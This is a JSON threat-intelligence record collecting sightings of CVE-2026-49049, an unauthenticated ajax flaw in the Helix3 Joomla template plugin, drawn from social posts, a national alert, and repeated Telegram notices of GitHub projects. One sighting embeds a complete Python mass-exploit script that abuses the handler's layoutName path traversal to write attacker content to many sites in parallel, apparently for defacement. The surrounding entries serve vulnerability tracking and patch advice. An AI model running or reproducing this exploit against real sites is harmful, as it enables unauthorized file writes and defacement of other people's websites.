{"vulnerability": "cve-2026-49049", "sightings": [{"uuid": "1d45859c-5dc1-4953-b492-d90825f9baaa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-49049", "type": "seen", "source": "https://bsky.app/profile/cve.skyfleet.blue/post/3mpgui7cu3k2o", "content": "CVE-2026-49049 - Joomla Extension - joomshaper.com - Unauthenticated access to Helix3 template ajax handler\nCVE ID : CVE-2026-49049\n \n Published : June 29, 2026, 2:34 p.m. | 1\u00a0hour, 11\u00a0minutes ago\n \n Description : The Helix3 plugin for Joomla exposes an ajax handler task, that...", "creation_timestamp": "2026-06-29T16:04:18.913175Z"}, {"uuid": "095882b6-f75b-4a25-9cd5-30d09ee54c87", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2026-49049", "type": "seen", "source": "https://dnsc.ro/citeste/alerta-vulnerabilitate-exploatata-activ-in-joomla-helix3", "content": "", "creation_timestamp": "2026-07-03T17:15:04.443224Z"}, {"uuid": "88250feb-67da-4a68-b85a-032a6ed4efa7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-49049", "type": "seen", "source": "https://infosec.exchange/users/vuldb/statuses/116860431613611432", "content": "Our CTI team identified a lot of activities targeting joomshaper Helix3 Extension (CVE-2026-49049) https://vuldb.com/vuln/374640/cti", "creation_timestamp": "2026-07-04T07:04:36.244166Z"}, {"uuid": "f658123b-c28a-45a0-b722-6749a70f5881", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-49049", "type": "seen", "source": "https://bsky.app/profile/suriq.io/post/3mqbr2xluki25", "content": "\ud83d\udd34 EXPLOITED\n\nA botnet is defacing Joomla sites through the Helix3 template framework, no login needed (CVE-2026-49049).\n\nIt hides in your database, so a file scan calls the site clean.\n\nFix: update both Helix3 plugins to 3.1.2, then check your template settings.", "creation_timestamp": "2026-07-10T08:45:06.894455Z"}, {"uuid": "c8f38285-15c9-4143-af6a-ca3aa386b3c9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-49049", "type": "seen", "source": "https://gist.github.com/6ickzone/aabde4a1ad4f5b88cd0205d13ba4b609", "content": "#!/usr/bin/env python3\nimport requests\nimport sys\nimport os\nfrom concurrent.futures import ThreadPoolExecutor\n\n# Colors\nCYAN = \"\\033[1;36m\"\nGREEN = \"\\033[1;32m\"\nYELLOW = \"\\033[1;33m\"\nRED = \"\\033[1;31m\"\nRESET = \"\\033[0m\"\n\ndef banner():\n    os.system('clear' if os.name == 'posix' else 'cls')\n    print(f\"\"\"{CYAN}\n   \u2588\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2557  \u2588\u2588\u2557\n  \u2588\u2588\u2554\u2550\u2550\u2550\u2588\u2588\u2557\u255a\u2588\u2588\u2557\u2588\u2588\u2554\u255d\n  \u2588\u2588\u2551   \u2588\u2588\u2551 \u255a\u2588\u2588\u2588\u2554\u255d \n  \u2588\u2588\u2551   \u2588\u2588\u2551 \u2588\u2588\u2554\u2588\u2588\u2557 \n  \u255a\u2588\u2588\u2588\u2588\u2588\u2588\u2554\u255d\u2588\u2588\u2554\u255d \u2588\u2588\u2557\n   \u255a\u2550\u2550\u2550\u2550\u2550\u255d \u255a\u2550\u255d  \u255a\u2550\u255d\n{RESET}\n[+] Helix3 Multi-Path Scanner\n[+] CVE-2026-49049 | By: 0x6ick\n\"\"\")\n\nHEADERS = {\n    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36'\n}\n\ndef exploit_target(target, filename, payload):\n    target = target.strip()\n    if not target.startswith(('http://','https://')): target = \"http://\" + target\n    target = target.rstrip('/')\n    \n    session = requests.Session()\n    session.headers.update(HEADERS)\n    \n    paths_to_try = [\n        '../../../' + filename, \n        'templates/shaper_helix3/layouts/' + filename, \n        'tmp/' + filename\n    ]\n    \n    try:\n        probe_url = f\"{target}/index.php?option=com_ajax&amp;plugin=helix3&amp;format=json\"\n        \n        # Probe\n        r = session.post(probe_url, data={'data[action]': 'save', 'data[layoutName]': 'probe', 'data[content]': '{\"t\":\"1\"}'}, timeout=8)\n        \n        if r.status_code == 200 and 'success' in r.text.lower():\n            for path in paths_to_try:\n                data_exploit = {\n                    'data[action]': 'save',\n                    'data[layoutName]': path,\n                    'data[content]': payload\n                }\n                session.post(probe_url, data=data_exploit, timeout=8)\n                \n                check = session.get(f\"{target}/{filename}.json\", timeout=5)\n                \n                if check.status_code == 200:\n                    print(f\"{GREEN}[+] SUCCESS: {target} (Path: {path}){RESET}\")\n                    with open(\"result.txt\", \"a\") as f: f.write(f\"{target}/{filename}.json\\n\")\n                    return True\n            \n            print(f\"{YELLOW}[!] VULN but Write failed on all paths: {target}{RESET}\")\n        else:\n            print(f\"{RED}[-] NOT VULN: {target}{RESET}\")\n            \n    except Exception:\n        print(f\"{RED}[-] ERROR: {target}{RESET}\")\n    return False\n\ndef main():\n    banner()\n    list_file = input(f\"{CYAN}[?] Target list file: {RESET}\")\n    \n    custom_name = input(f\"{CYAN}[?] Filename (default: 0x6ick): {RESET}\") or \"0x6ick\"\n    custom_payload = input(f\"{CYAN}[?] JSON content (default: stamped by 0x6ick): {RESET}\") or \"stamped by 0x6ick\"\n    \n    try:\n        with open(list_file, \"r\") as f:\n            targets = list(set([line.strip() for line in f if line.strip()]))\n        \n        print(f\"\\n{CYAN}[*] Starting mass exploit on {len(targets)} targets...{RESET}\\n\")\n        \n        with ThreadPoolExecutor(max_workers=15) as executor:\n            for t in targets:\n                executor.submit(exploit_target, t, custom_name, custom_payload)\n            \n        print(f\"\\n{GREEN}[+] DONE! Results saved in result.txt{RESET}\")\n        \n    except FileNotFoundError:\n        print(f\"{RED}[!] File not found!{RESET}\")\n\nif __name__ == \"__main__\":\n    main()\n", "creation_timestamp": "2026-07-13T06:01:19.425242Z"}, {"uuid": "d88aa82c-7eb4-470b-8f79-bb5b9a39becd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-49049", "type": "seen", "source": "https://t.me/GithubRedTeam/91930", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #Vulnerability Scanner\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a CVE-2026-49049\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a shinthink\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Python\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-07-04 16:31:37\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nRead-only vulnerability scanner for CVE-2026-49049 \u2014 Helix3 Joomla plugin unauthenticated AJAX handler\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-07-13T22:00:13.059227Z"}, {"uuid": "67cb859f-c4dc-4348-9f3f-3ae0f9e155e4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-49049", "type": "seen", "source": "https://t.me/GithubRedTeam/92039", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #XSS #CVE\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a asdsadsadasdasdsadsad\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a frada321\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Unknown\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-07-05 12:56:01\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\n\u202fCVE-2026-49049 - Unauthenticated File Deletion, Arbitrary Write &amp; XSS Injection for Helix3 Joomla Extension\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-07-13T22:00:12.312285Z"}, {"uuid": "67f46422-1add-4800-aa64-45d9d4a09572", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-49049", "type": "seen", "source": "https://t.me/GithubRedTeam/91930", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #Vulnerability Scanner\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a CVE-2026-49049\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a shinthink\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Python\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-07-04 16:31:37\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nRead-only vulnerability scanner for CVE-2026-49049 \u2014 Helix3 Joomla plugin unauthenticated AJAX handler\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-07-14T00:00:21.042619Z"}, {"uuid": "2ed7d88c-e90e-4860-ad53-d1f252c3293f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-49049", "type": "seen", "source": "https://t.me/GithubRedTeam/92039", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #XSS #CVE\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a asdsadsadasdasdsadsad\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a frada321\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Unknown\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-07-05 12:56:01\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\n\u202fCVE-2026-49049 - Unauthenticated File Deletion, Arbitrary Write &amp; XSS Injection for Helix3 Joomla Extension\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-07-14T01:00:14.688169Z"}, {"uuid": "2ca159b3-b4a5-4ca5-83bb-7d278c6b9cb4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-49049", "type": "seen", "source": "https://t.me/GithubRedTeam/92039", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #XSS #CVE\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a asdsadsadasdasdsadsad\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a frada321\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Unknown\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-07-05 12:56:01\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\n\u202fCVE-2026-49049 - Unauthenticated File Deletion, Arbitrary Write &amp; XSS Injection for Helix3 Joomla Extension\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-07-15T00:00:29.713327Z"}, {"uuid": "3fc7d3d0-cda8-4527-94c1-7abbb5e15ed7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-49049", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/91930", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #Vulnerability Scanner\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a CVE-2026-49049\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a shinthink\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Python\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-07-04 16:31:37\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nRead-only vulnerability scanner for CVE-2026-49049 \u2014 Helix3 Joomla plugin unauthenticated AJAX handler\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-07-15T00:00:29.167064Z"}]}